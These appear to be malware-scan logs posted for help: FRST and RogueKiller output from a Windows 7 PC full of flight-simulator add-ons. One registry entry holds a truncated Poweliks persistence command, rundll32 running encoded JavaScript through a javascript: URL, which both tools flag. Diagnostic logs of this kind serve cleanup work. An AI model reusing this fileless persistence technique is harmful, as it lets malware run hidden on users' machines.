PMDG 737 8900 NGX (HKLM-x32\...\{20708FD5-E94D-4097-A21E-E28564CDBC06}) (Version: 1.00.3219 - PMDG Simulations, LLC.)

PMDG 747-400/400F for FSX (HKLM-x32\...\{EDCEE320-0FB3-4197-9F86-8C1CCF2278FB}) (Version: 2.10.0040 - Precision Manuals Development Group)

PMDG 777-200LR/F Base Package FSX (HKLM-x32\...\{0F16340B-5B5B-4531-8D87-4952E3BCA6E6}) (Version: 1.10.6155 - PMDG Simulations, LLC.)

PMDG 777-300ER Expansion (HKLM-x32\...\{E65EFDE6-0864-40BA-8DDF-E31F736D9000}) (Version: 1.10.6155 - PMDG Simulations, LLC.)

PMDG744X_GE_LH (HKLM-x32\...\{20372FAA-3AF4-4B3D-9B1D-564CDEA5957C}) (Version: 1.00.0000 - Precision Manuals Development Group)

PMDG744X_PW_UA2 (HKLM-x32\...\{2B5DDFFF-F347-489E-861D-98D02D00472D}) (Version: 1.10.0000 - Precision Manuals Development Group)

PMDG744X_PW_UA3 (HKLM-x32\...\{EAB979F7-84A6-47B6-AB39-CA73A6EEAE69}) (Version: 1.00.0000 - Precision Manuals Development Group)

Punta Cana X-Generation FSX v1.0 (HKLM-x32\...\tsimmdpcxx) (Version:  - )

QualityWings Ultimate 757 Collection FSX (HKLM-x32\...\QualityWings Ultimate 757 Collection FSX_is1) (Version: 1.3.2 - QualityWings)

QuickTime 7 (HKLM-x32\...\{3D2CBC2C-65D4-4463-87AB-BB2C859C1F3E}) (Version: 7.76.80.95 - Apple Inc.)

RAAS Professional by FS2Crew (LOCKED) (HKLM-x32\...\RAAS Professional by FS2Crew (LOCKED)) (Version:  - )

Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.6923 - Realtek Semiconductor Corp.)

Rio Santos Dumont FSX P3D 1.1 (HKLM-x32\...\sbrjfsx) (Version: 1.1 - TropicalSim)

RollerCoaster Tycoon 3: Platinum! (HKLM-x32\...\Steam App 2700) (Version:  - Frontier)

SHIELD Streaming (Version: 3.1.2000 - NVIDIA Corporation) Hidden

SHIELD Wireless Controller Driver (Version: 16.13.65 - NVIDIA Corporation) Hidden

SimCity™ (HKLM-x32\...\{F70FDE4B-8F86-4eb6-8C8E-636EC89F6419}) (Version: 2.0.0.0 - Electronic Arts)

St Thomas TIST2010 2.0 (HKLM-x32\...\tist2010fsx) (Version: 2.0 - TropicalSim)

Steam (HKLM-x32\...\Steam) (Version:  - Valve Corporation)

The Political Machine 2012 (HKLM-x32\...\Steam App 211120) (Version:  - Stardock Entertainment)

Tocumen Intl', Panama City FSX 1.0 (HKLM-x32\...\tsimmptoxx) (Version:  - )

TOPCAT 2.74 Beta 1 - Take-Off and Landing Performance Calculation Tool (HKLM-x32\...\TOPCAT) (Version: 2.74 Beta 1 - FSS GmbH)

Train Simulator 2015 (HKLM-x32\...\Steam App 24010) (Version:  - RailSimulator.com)

Ultimate General: Gettysburg (HKLM-x32\...\Steam App 306660) (Version:  - Game-Labs)

UVACARS (HKLM-x32\...\{8FA014EE-A721-428F-89F7-82F7B82D4386}) (Version: 3.3.15 - United Virtual Airlines)

VC_CRT_x64 (Version: 1.02.0000 - Intel Corporation) Hidden

VIRTUALI Addon ManagerX FSX (HKLM-x32\...\VIRTUALI Addon ManagerX FSX_is1) (Version: 2.9.0.23 - VIRTUALI Sagl)

vroute.info (HKU\S-1-5-21-4134620719-2527629264-1752102789-1000\...\ea913c639d7ea423) (Version: 1.1.1.3 - vroute)

Windows Driver Package - Dynastream Innovations, Inc. ANT LibUSB Drivers (04/11/2012 1.2.40.201) (HKLM\...\F9D2A789F9CFF8CEC36B544F53877C80F1F73C46) (Version: 04/11/2012 1.2.40.201 - Dynastream Innovations, Inc.)

Windows Driver Package - Garmin (grmnusb) GARMIN Devices  (04/19/2012 2.3.1.0) (HKLM\...\98157A226B40B173301B0F53C8E98C47805D5152) (Version: 04/19/2012 2.3.1.0 - Garmin)

Windows Driver Package - Silicon Labs Software (DSI_SiUSBXp_3_1) USB  (02/06/2007 3.1) (HKLM\...\D1506E0025B5A3F9EB8270FE81C1EEDD9388B8A2) (Version: 02/06/2007 3.1 - Silicon Labs Software)

Windows Live Essentials (HKLM-x32\...\WinLiveSuite) (Version: 16.4.3528.0331 - Microsoft Corporation)

WinRAR 5.01 (32-bit) (HKLM-x32\...\WinRAR archiver) (Version: 5.01.0 - win.rar GmbH)

ZipGenius 6.3 (HKLM-x32\...\{EC3B598C-1151-4191-B5B4-A9072ADE6259}_is1) (Version: 6.3 - Wininizio.it Software)

 

==================== Custom CLSID (selected items): ==========================

 

(If an entry is included in the fixlist, it will be removed from registry. Any eventual file will not be moved.)

 

CustomCLSID: HKU\S-1-5-21-4134620719-2527629264-1752102789-1000_Classes\CLSID\{0F22A205-CFB0-4679-8499-A6F44A80A208}\InprocServer32 -> C:\Users\Swintal\AppData\Local\Google\Update\1.3.25.5\psuser_64.dll (Google Inc.)

CustomCLSID: HKU\S-1-5-21-4134620719-2527629264-1752102789-1000_Classes\CLSID\{90B3DFBF-AF6A-4EA0-8899-F332194690F8}\InprocServer32 -> C:\Users\Swintal\AppData\Local\Google\Update\1.3.24.15\psuser_64.dll No File

CustomCLSID: HKU\S-1-5-21-4134620719-2527629264-1752102789-1000_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32 -> rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 247 more characters). <==== Poweliks?

CustomCLSID: HKU\S-1-5-21-4134620719-2527629264-1752102789-1000_Classes\CLSID\{E8CF3E55-F919-49D9-ABC0-948E6CB34B9F}\InprocServer32 -> C:\Users\Swintal\AppData\Local\Google\Update\1.3.25.5\psuser_64.dll (Google Inc.)

 

==================== Restore Points  =========================

 

09-11-2014 22:24:34 Installed Navtech PBS

11-11-2014 12:28:51 Windows Update

11-11-2014 12:56:25 Installed DirectX

11-11-2014 16:30:13 Removed bluCARS

11-11-2014 16:32:59 Installed bluCARS

11-11-2014 19:52:02 Installed DirectX

11-11-2014 19:56:23 Removed Professional Flight Planner X

12-11-2014 02:12:03 Restore Operation

 

==================== Hosts content: ==========================

 

(If needed Hosts: directive could be included in the fixlist to reset Hosts.)

 

2009-07-13 21:34 - 2009-06-10 16:00 - 00000824 ____A C:\Windows\system32\Drivers\etc\hosts

 

==================== Scheduled Tasks (whitelisted) =============

 

(If an entry is included in the fixlist, it will be removed from registry. Any associated file could be listed separately to be moved.)

 

Task: {1CFCAE88-C488-4548-AEA2-F7CCD8E91383} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2014-03-01] (Google Inc.)

Task: {1F1F653A-9A63-4693-A116-3801A0037465} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2014-11-11] (Adobe Systems Incorporated)

Task: {1FC54D89-1B6C-4516-8C55-88DBB102F513} - System32\Tasks\Apple Diagnostics => C:\Program Files (x86)\Common Files\Apple\Internet Services\EReporter.exe [2014-10-17] (Apple Inc.)

Task: {2FB88A66-255E-4A6A-A935-E740E57BAF93} - System32\Tasks\GoogleUpdateTaskUserS-1-5-21-4134620719-2527629264-1752102789-1000UA => C:\Users\Swintal\AppData\Local\Google\Update\GoogleUpdate.exe [2014-08-10] (Google Inc.)

Task: {40AC2BF1-F61D-4558-B612-A4BA032B00C7} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentLogOn => C:\Program Files\Microsoft Office 15\root\Office15\msoia.exe [2014-08-26] (Microsoft Corporation)

Task: {4BD843C3-CFEA-40A4-9AE5-9C55460199CA} - System32\Tasks\Microsoft_MKC_Logon_Task_itype.exe => C:\Program Files\Microsoft Mouse and Keyboard Center\itype.exe [2014-03-19] (Microsoft Corporation)

Task: {4F161FB8-515E-44F8-B090-EBA22AED117E} - System32\Tasks\GoogleUpdateTaskUserS-1-5-21-4134620719-2527629264-1752102789-1000Core => C:\Users\Swintal\AppData\Local\Google\Update\GoogleUpdate.exe [2014-08-10] (Google Inc.)

Task: {668ACBED-DED4-49A0-BF68-DEA3DED3165A} - System32\Tasks\Microsoft_MKC_Logon_Task_ipoint.exe => C:\Program Files\Microsoft Mouse and Keyboard Center\ipoint.exe [2014-03-19] (Microsoft Corporation)

Task: {7496BE44-E7B5-4B6D-99ED-83342B76092D} - System32\Tasks\Microsoft_Hardware_Launch_ipoint_exe => C:\Program Files\Microsoft Mouse and Keyboard Center\ipoint.exe [2014-03-19] (Microsoft Corporation)

Task: {77877023-269F-4E8B-B766-EBB3BC7D4AD1} - System32\Tasks\HP AR Program Upload - b6f1b5de96b0434191ee7a5939bcdd2fed889e11d632473bb14d345dcf17970a => C:\Program Files\HP\HP ENVY 4500 series\bin\HPRewards.exe [2014-03-06] (TODO: <Company name>)

Task: {7DCE01C5-DA32-4944-9E28-BD300B1CE1CD} - System32\Tasks\Microsoft Office 15 Sync Maintenance for Swintal-PC-Swintal Swintal-PC => C:\Program Files\Microsoft Office 15\Root\Office15\MsoSync.exe [2014-09-16] (Microsoft Corporation)

Task: {81F4DB92-CFD7-4E7B-AE0E-F77A560732A9} - System32\Tasks\ASUS\i-Setup132150 => C:\Windows\Chipset\AsusSetup.exe [2010-09-08] (ASUSTeK Computer Inc.)

Task: {84E00E03-EFA2-40C3-A897-3B5ED119201A} - System32\Tasks\Microsoft_Hardware_Launch_itype_exe => C:\Program Files\Microsoft Mouse and Keyboard Center\itype.exe [2014-03-19] (Microsoft Corporation)

Task: {8BFD38ED-AEEE-4BF9-A623-86D53F843A53} - System32\Tasks\Microsoft\Office\Office Automatic Updates => C:\Program Files\Microsoft Office 15\ClientX64\OfficeC2RClient.exe [2014-09-25] (Microsoft Corporation)

Task: {AE001CD3-A7A1-42E3-9B33-B152E1D23274} - System32\Tasks\ASUS\i-Setup132035 => C:\Windows\Chipset\AsusSetup.exe [2010-09-08] (ASUSTeK Computer Inc.)

Task: {C9CA414C-B003-452A-9D78-C78A251B18E7} - System32\Tasks\Microsoft_Hardware_Launch_mousekeyboardcenter_exe => C:\Program Files\Microsoft Mouse and Keyboard Center\mousekeyboardcenter.exe [2014-03-19] (Microsoft)

Task: {DB2AFA52-A0DE-4770-BDEA-1CE2AE2C6C30} - System32\Tasks\Apple\AppleSoftwareUpdate => C:\Program Files (x86)\Apple Software Update\SoftwareUpdate.exe [2011-06-01] (Apple Inc.)

Task: {F71B3540-246F-452A-B331-044D7D4C5D0D} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentFallBack => C:\Program Files\Microsoft Office 15\root\Office15\msoia.exe [2014-08-26] (Microsoft Corporation)

Task: {FA4859D3-569B-462F-90CE-053288C3DEC7} - System32\Tasks\GarminUpdaterTask => C:\Program Files (x86)\Garmin\Express Self Updater\ExpressSelfUpdater.exe [2014-07-23] ()

Task: {FFAE2AEB-409D-4600-A1EA-B0633B5EC4FF} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2014-03-01] (Google Inc.)

Task: C:\Windows\Tasks\Adobe Flash Player Updater.job => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe

Task: C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe

Task: C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe

Task: C:\Windows\Tasks\GoogleUpdateTaskUserS-1-5-21-4134620719-2527629264-1752102789-1000Core.job => C:\Users\Swintal\AppData\Local\Google\Update\GoogleUpdate.exe

Task: C:\Windows\Tasks\GoogleUpdateTaskUserS-1-5-21-4134620719-2527629264-1752102789-1000UA.job => C:\Users\Swintal\AppData\Local\Google\Update\GoogleUpdate.exe

 

==================== Loaded Modules (whitelisted) =============

 

2014-03-01 12:32 - 2012-10-29 02:48 - 00927232 _____ () C:\Program Files (x86)\ASUS\AXSP\1.01.01\atkexComSvc.exe

2014-03-01 16:22 - 2014-07-02 13:55 - 00116568 _____ () C:\Program Files\NVIDIA Corporation\Display\NvSmartMax64.dll

2014-03-03 09:26 - 2014-05-20 08:19 - 00105640 _____ () C:\Program Files\Microsoft Office 15\ClientX64\ApiClient.dll

2014-10-25 07:48 - 2014-09-09 09:59 - 08896160 _____ () C:\Program Files\Microsoft Office 15\root\Office15\1033\GrooveIntlResource.dll

2014-09-26 11:31 - 2014-09-26 11:31 - 00393376 _____ () C:\Program Files\Microsoft Office 15\Root\Office15\AppVIsvStream64.dll

2014-02-12 19:58 - 2014-02-12 19:58 - 00073544 _____ () C:\Program Files (x86)\Common Files\Apple\Apple Application Support\zlib1.dll

2014-10-11 12:05 - 2014-10-11 12:05 - 01044776 _____ () C:\Program Files (x86)\Common Files\Apple\Apple Application Support\libxml2.dll

2014-03-01 12:32 - 2014-11-11 21:30 - 00031232 _____ () C:\Program Files (x86)\ASUS\AXSP\1.01.01\PEbiosinterface32.dll

2014-03-01 12:32 - 2012-05-07 11:04 - 00104448 _____ () C:\Program Files (x86)\ASUS\AXSP\1.01.01\ATKEX.dll

2014-10-25 07:48 - 2014-09-09 08:12 - 08896160 _____ () C:\Program Files\Microsoft Office 15\root\VFS\ProgramFilesX86\Microsoft Office\Office15\1033\GrooveIntlResource.dll

2012-09-24 08:24 - 2012-09-24 08:24 - 00020480 _____ () C:\Program Files (x86)\PI Engineering\MacroWorks 3.1\Interfaces.dll

2014-03-02 14:28 - 2013-12-08 20:23 - 00732160 _____ () C:\Program Files (x86)\Navigraph\FMS Data Manager\libGLESv2.dll

2014-03-02 14:28 - 2013-12-08 20:32 - 00854016 _____ () C:\Program Files (x86)\Navigraph\FMS Data Manager\platforms\qwindows.dll

2014-03-02 14:28 - 2013-12-08 20:23 - 00047104 _____ () C:\Program Files (x86)\Navigraph\FMS Data Manager\libEGL.dll

2014-03-02 14:28 - 2013-12-08 20:31 - 00021504 _____ () C:\Program Files (x86)\Navigraph\FMS Data Manager\imageformats\qico.dll

2014-10-28 09:00 - 2014-10-21 23:04 - 01042760 _____ () C:\Program Files (x86)\Google\Chrome\Application\38.0.2125.111\libglesv2.dll

2014-10-28 09:00 - 2014-10-21 23:04 - 00211272 _____ () C:\Program Files (x86)\Google\Chrome\Application\38.0.2125.111\libegl.dll

2014-10-28 09:00 - 2014-10-21 23:04 - 08910664 _____ () C:\Program Files (x86)\Google\Chrome\Application\38.0.2125.111\pdf.dll

2014-10-28 09:00 - 2014-10-21 23:04 - 01681224 _____ () C:\Program Files (x86)\Google\Chrome\Application\38.0.2125.111\ffmpegsumo.dll

2014-01-03 01:59 - 2014-02-10 12:04 - 00430080 _____ () C:\Windows\mod_frst.exe

 

==================== Alternate Data Streams (whitelisted) =========

 

(If an entry is included in the fixlist, only the Alternate Data Streams will be removed.)

 

AlternateDataStreams: C:\ProgramData\TEMP:00934A10

AlternateDataStreams: C:\ProgramData\TEMP:74603393

 

==================== Safe Mode (whitelisted) ===================

 

(If an item is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)

 

 

==================== EXE Association (whitelisted) =============

 

(If an entry is included in the fixlist, the default will be restored. None default entries will be removed.)

 

 

==================== MSCONFIG/TASK MANAGER disabled items =========

 

(Currently there is no automatic fix for this section.)

 

 

========================= Accounts: ==========================

 

Administrator (S-1-5-21-4134620719-2527629264-1752102789-500 - Administrator - Disabled)

Brian (S-1-5-21-4134620719-2527629264-1752102789-1004 - Limited - Enabled) => C:\Users\Brian

Guest (S-1-5-21-4134620719-2527629264-1752102789-501 - Limited - Disabled)

HomeGroupUser$ (S-1-5-21-4134620719-2527629264-1752102789-1003 - Limited - Enabled)

Swintal (S-1-5-21-4134620719-2527629264-1752102789-1000 - Administrator - Enabled) => C:\Users\Swintal

 

==================== Faulty Device Manager Devices =============

 

 

==================== Event log errors: =========================

 

Application errors:

==================

Error: (11/11/2014 09:35:56 PM) (Source: Chrome) (EventID: 1) (User: NT AUTHORITY)

Description: Chrome has encountered a fatal error.

ver=38.0.2125.111;lang=;guid=1E499807DE364B569E83CEEACDEA246E;is_machine=1;oop=1;upload=1;minidump=C:\Program Files (x86)\Google\CrashReports\7d62fd68-5e25-4b57-9e2b-329ba36424f1.dmp

 

Error: (11/11/2014 09:33:02 PM) (Source: System Restore) (EventID: 8210) (User: )

Description: An unspecified error occurred during System Restore: (Installed Navtech PBS). Additional information: 0x80070005.

 

Error: (11/11/2014 09:32:13 PM) (Source: WinMgmt) (EventID: 10) (User: )

Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003

 

Error: (11/11/2014 09:31:59 PM) (Source: Application Error) (EventID: 1000) (User: )

Description: Faulting application name: svchost.exe_stisvc, version: 6.1.7600.16385, time stamp: 0x4a5bc3c1

Faulting module name: HPWia2_EN4500.dll, version: 30.0.411.0, time stamp: 0x505b7712

Exception code: 0x40000015

Fault offset: 0x00000000000324ad

Faulting process id: 0x44c

Faulting application start time: 0xsvchost.exe_stisvc0

Faulting application path: svchost.exe_stisvc1

Faulting module path: svchost.exe_stisvc2

Report Id: svchost.exe_stisvc3

 

Error: (11/11/2014 09:08:40 PM) (Source: WinMgmt) (EventID: 10) (User: )

Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003

 

Error: (11/11/2014 04:38:31 PM) (Source: Application Error) (EventID: 1000) (User: )

Description: Faulting application name: iexplore.exe, version: 11.0.9600.17344, time stamp: 0x4a5bc6b7

Faulting module name: Flash32_15_0_0_223.ocx, version: 15.0.0.223, time stamp: 0x544ecba4

Exception code: 0xc0000005

Fault offset: 0x005e96c7

Faulting process id: 0x1f28

Faulting application start time: 0xiexplore.exe0

Faulting application path: iexplore.exe1

Faulting module path: iexplore.exe2

Report Id: iexplore.exe3

 

Error: (11/11/2014 04:21:14 PM) (Source: Application Error) (EventID: 1000) (User: )

Description: Faulting application name: iexplore.exe, version: 11.0.9600.17344, time stamp: 0x4a5bc6b7

Faulting module name: ntdll.dll, version: 6.1.7601.18247, time stamp: 0x521ea8e7

Exception code: 0xc0000005

Fault offset: 0x000379ed

Faulting process id: 0x73c

Faulting application start time: 0xiexplore.exe0

Faulting application path: iexplore.exe1

Faulting module path: iexplore.exe2

Report Id: iexplore.exe3

 

Error: (11/11/2014 04:17:52 PM) (Source: WinMgmt) (EventID: 10) (User: )

Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003

 

Error: (11/11/2014 04:17:44 PM) (Source: Application Error) (EventID: 1000) (User: )

Description: Faulting application name: svchost.exe_stisvc, version: 6.1.7600.16385, time stamp: 0x4a5bc3c1

Faulting module name: HPWia2_EN4500.dll, version: 30.0.411.0, time stamp: 0x505b7712

Exception code: 0x40000015

Fault offset: 0x00000000000324ad

Faulting process id: 0x538

Faulting application start time: 0xsvchost.exe_stisvc0

Faulting application path: svchost.exe_stisvc1

Faulting module path: svchost.exe_stisvc2

Report Id: svchost.exe_stisvc3

 

Error: (11/11/2014 04:10:10 PM) (Source: WinMgmt) (EventID: 10) (User: )

Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003

 

 

System errors:

=============

Error: (11/11/2014 09:33:35 PM) (Source: DCOM) (EventID: 10010) (User: )

Description: {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}

 

Error: (11/11/2014 09:32:18 PM) (Source: Service Control Manager) (EventID: 7034) (User: )

Description: The Windows Image Acquisition (WIA) service terminated unexpectedly.  It has done this 1 time(s).

 

Error: (11/11/2014 09:31:16 PM) (Source: Service Control Manager) (EventID: 7000) (User: )

Description: The Garmin Core Update Service service failed to start due to the following error: 

%%1053

 

Error: (11/11/2014 09:31:16 PM) (Source: Service Control Manager) (EventID: 7009) (User: )

Description: A timeout was reached (30000 milliseconds) while waiting for the Garmin Core Update Service service to connect.

 

Error: (11/11/2014 09:09:54 PM) (Source: DCOM) (EventID: 10010) (User: )

Description: {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}

 

Error: (11/11/2014 09:08:42 PM) (Source: Service Control Manager) (EventID: 7000) (User: )

Description: The IPsec Policy Agent service failed to start due to the following error: 

%%1053

 

Error: (11/11/2014 09:08:42 PM) (Source: Service Control Manager) (EventID: 7009) (User: )

Description: A timeout was reached (30000 milliseconds) while waiting for the IPsec Policy Agent service to connect.

 

Error: (11/11/2014 09:07:13 PM) (Source: BugCheck) (EventID: 1001) (User: )

Description: 0x00000024 (0x00000000001904fb, 0xfffff880033385e8, 0xfffff88003337e40, 0xfffff80002eb8c50)C:\Windows\MEMORY.DMP111114-30482-01

 

Error: (11/11/2014 09:07:13 PM) (Source: EventLog) (EventID: 6008) (User: )

Description: The previous system shutdown at 5:30:10 PM on 11/11/2014 was unexpected.

 

Error: (11/11/2014 04:20:44 PM) (Source: DCOM) (EventID: 10010) (User: )

Description: {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}

 

 

Microsoft Office Sessions:

=========================

Error: (11/11/2014 09:35:56 PM) (Source: Chrome) (EventID: 1) (User: NT AUTHORITY)

Description: Chrome has encountered a fatal error.

ver=38.0.2125.111;lang=;guid=1E499807DE364B569E83CEEACDEA246E;is_machine=1;oop=1;upload=1;minidump=C:\Program Files (x86)\Google\CrashReports\7d62fd68-5e25-4b57-9e2b-329ba36424f1.dmp

 

Error: (11/11/2014 09:33:02 PM) (Source: System Restore) (EventID: 8210) (User: )

Description: Installed Navtech PBS0x80070005

 

Error: (11/11/2014 09:32:13 PM) (Source: WinMgmt) (EventID: 10) (User: )

Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003

 

Error: (11/11/2014 09:31:59 PM) (Source: Application Error) (EventID: 1000) (User: )

Description: svchost.exe_stisvc6.1.7600.163854a5bc3c1HPWia2_EN4500.dll30.0.411.0505b77124000001500000000000324ad44c01cffe20ca755d39C:\Windows\system32\svchost.exeC:\Windows\system32\HPWia2_EN4500.dll139dab8c-6a14-11e4-af9d-ac220b2a544f

 

Error: (11/11/2014 09:08:40 PM) (Source: WinMgmt) (EventID: 10) (User: )

Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003

 

Error: (11/11/2014 04:38:31 PM) (Source: Application Error) (EventID: 1000) (User: )

Description: iexplore.exe11.0.9600.173444a5bc6b7Flash32_15_0_0_223.ocx15.0.0.223544ecba4c0000005005e96c71f2801cffdf6c5f923c7C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\Macromed\Flash\Flash32_15_0_0_223.ocx141502f9-69eb-11e4-b41e-ac220b2a544f

 

Error: (11/11/2014 04:21:14 PM) (Source: Application Error) (EventID: 1000) (User: )

Description: iexplore.exe11.0.9600.173444a5bc6b7ntdll.dll6.1.7601.18247521ea8e7c0000005000379ed73c01cffdf55f40e0d4C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\ntdll.dllaa530802-69e8-11e4-b41e-ac220b2a544f

 

Error: (11/11/2014 04:17:52 PM) (Source: WinMgmt) (EventID: 10) (User: )

Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003

 

Error: (11/11/2014 04:17:44 PM) (Source: Application Error) (EventID: 1000) (User: )

Description: svchost.exe_stisvc6.1.7600.163854a5bc3c1HPWia2_EN4500.dll30.0.411.0505b77124000001500000000000324ad53801cffdf4e146e30dC:\Windows\system32\svchost.exeC:\Windows\system32\HPWia2_EN4500.dll2ca5b8e0-69e8-11e4-b41e-ac220b2a544f

 

Error: (11/11/2014 04:10:10 PM) (Source: WinMgmt) (EventID: 10) (User: )

Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003

 

 

==================== Memory info =========================== 

 

Processor: Intel® Core i7-4771 CPU @ 3.50GHz

Percentage of memory in use: 22%

Total physical RAM: 16322.27 MB

Available physical RAM: 12717.07 MB

Total Pagefile: 32642.72 MB

Available Pagefile: 28962.79 MB

Total Virtual: 8192 MB

Available Virtual: 8191.84 MB

 

==================== Drives ================================

 

Drive c: () (Fixed) (Total:931.41 GB) (Free:721.61 GB) NTFS

Drive e: (Second Drive) (Fixed) (Total:931.51 GB) (Free:844.12 GB) NTFS

 

==================== MBR & Partition Table ==================

 

========================================================

Disk: 0 (MBR Code: Windows 7 or 8) (Size: 931.5 GB) (Disk ID: ACBBF63B)

Partition 1: (Active) - (Size=100 MB) - (Type=07 NTFS)

Partition 2: (Not Active) - (Size=931.4 GB) - (Type=07 NTFS)

 

========================================================

Disk: 1 (MBR Code: Windows 7 or 8) (Size: 931.5 GB) (Disk ID: 76A56381)

Partition 1: (Not Active) - (Size=931.5 GB) - (Type=07 NTFS)

 

==================== End Of Log ============================


RogueKiller V10.0.5.0 (x64) [Nov 11 2014] by Adlice Software





 

Operating System : Windows 7 (6.1.7601 Service Pack 1) 64 bits version

Started in : Normal mode

User : Swintal [Administrator]

Mode : Scan -- Date : 11/11/2014  21:54:42

 

¤¤¤ Processes : 2 ¤¤¤

[Proc.Injected] ekrn.exe -- [x] -> Killed [DrvNtTerm]

[Proc.Injected] dllhost.exe -- [x] -> Killed [TermProc]

 

¤¤¤ Registry : 15 ¤¤¤

[suspicious.Path] (X64) HKEY_USERS\S-1-5-21-4134620719-2527629264-1752102789-1000\Software\Microsoft\Windows\CurrentVersion\Run | Google+ Auto Backup : "C:\Users\Swintal\AppData\Local\Programs\Google\Google+ Auto Backup\Google+ Auto Backup.exe" /autostart  -> Found

[suspicious.Path] (X86) HKEY_USERS\S-1-5-21-4134620719-2527629264-1752102789-1000\Software\Microsoft\Windows\CurrentVersion\Run | Google+ Auto Backup : "C:\Users\Swintal\AppData\Local\Programs\Google\Google+ Auto Backup\Google+ Auto Backup.exe" /autostart  -> Found

[PUM.Dns] (X64) HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters | DhcpNameServer : 209.18.47.61 209.18.47.62 [UNITED STATES (US)][UNITED STATES (US)]  -> Found

[PUM.Dns] (X64) HKEY_LOCAL_MACHINE\System\ControlSet001\Services\Tcpip\Parameters | DhcpNameServer : 209.18.47.61 209.18.47.62 [UNITED STATES (US)][UNITED STATES (US)]  -> Found

[PUM.Dns] (X64) HKEY_LOCAL_MACHINE\System\ControlSet002\Services\Tcpip\Parameters | DhcpNameServer : 209.18.47.61 209.18.47.62 [UNITED STATES (US)][UNITED STATES (US)]  -> Found

[PUM.Dns] (X64) HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{46F98522-0B7E-4616-8783-34B23EF7FE3A} | DhcpNameServer : 209.18.47.61 209.18.47.62 [UNITED STATES (US)][UNITED STATES (US)]  -> Found

[PUM.Dns] (X64) HKEY_LOCAL_MACHINE\System\ControlSet001\Services\Tcpip\Parameters\Interfaces\{46F98522-0B7E-4616-8783-34B23EF7FE3A} | DhcpNameServer : 209.18.47.61 209.18.47.62 [UNITED STATES (US)][UNITED STATES (US)]  -> Found

[PUM.Dns] (X64) HKEY_LOCAL_MACHINE\System\ControlSet002\Services\Tcpip\Parameters\Interfaces\{46F98522-0B7E-4616-8783-34B23EF7FE3A} | DhcpNameServer : 209.18.47.61 209.18.47.62 [UNITED STATES (US)][UNITED STATES (US)]  -> Found

[PUM.StartMenu] (X64) HKEY_USERS\S-1-5-21-4134620719-2527629264-1752102789-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced | Start_ShowMyGames : 0  -> Found

[PUM.StartMenu] (X86) HKEY_USERS\S-1-5-21-4134620719-2527629264-1752102789-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced | Start_ShowMyGames : 0  -> Found

[PUM.DesktopIcons] (X64) HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\HideDesktopIcons\NewStartPanel | {20D04FE0-3AEA-1069-A2D8-08002B30309D} : 1  -> Found

[PUM.DesktopIcons] (X64) HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\HideDesktopIcons\NewStartPanel | {59031a47-3f72-44a7-89c5-5595fe6b30ee} : 1  -> Found

[PUM.DesktopIcons] (X86) HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\HideDesktopIcons\NewStartPanel | {20D04FE0-3AEA-1069-A2D8-08002B30309D} : 1  -> Found

[PUM.DesktopIcons] (X86) HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\HideDesktopIcons\NewStartPanel | {59031a47-3f72-44a7-89c5-5595fe6b30ee} : 1  -> Found

[Tr.Poweliks] (X64) HKEY_USERS\S-1-5-21-4134620719-2527629264-1752102789-1000\Software\classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\LocalServer32 -> Found

 

¤¤¤ Tasks : 0 ¤¤¤

 

¤¤¤ Files : 0 ¤¤¤

 

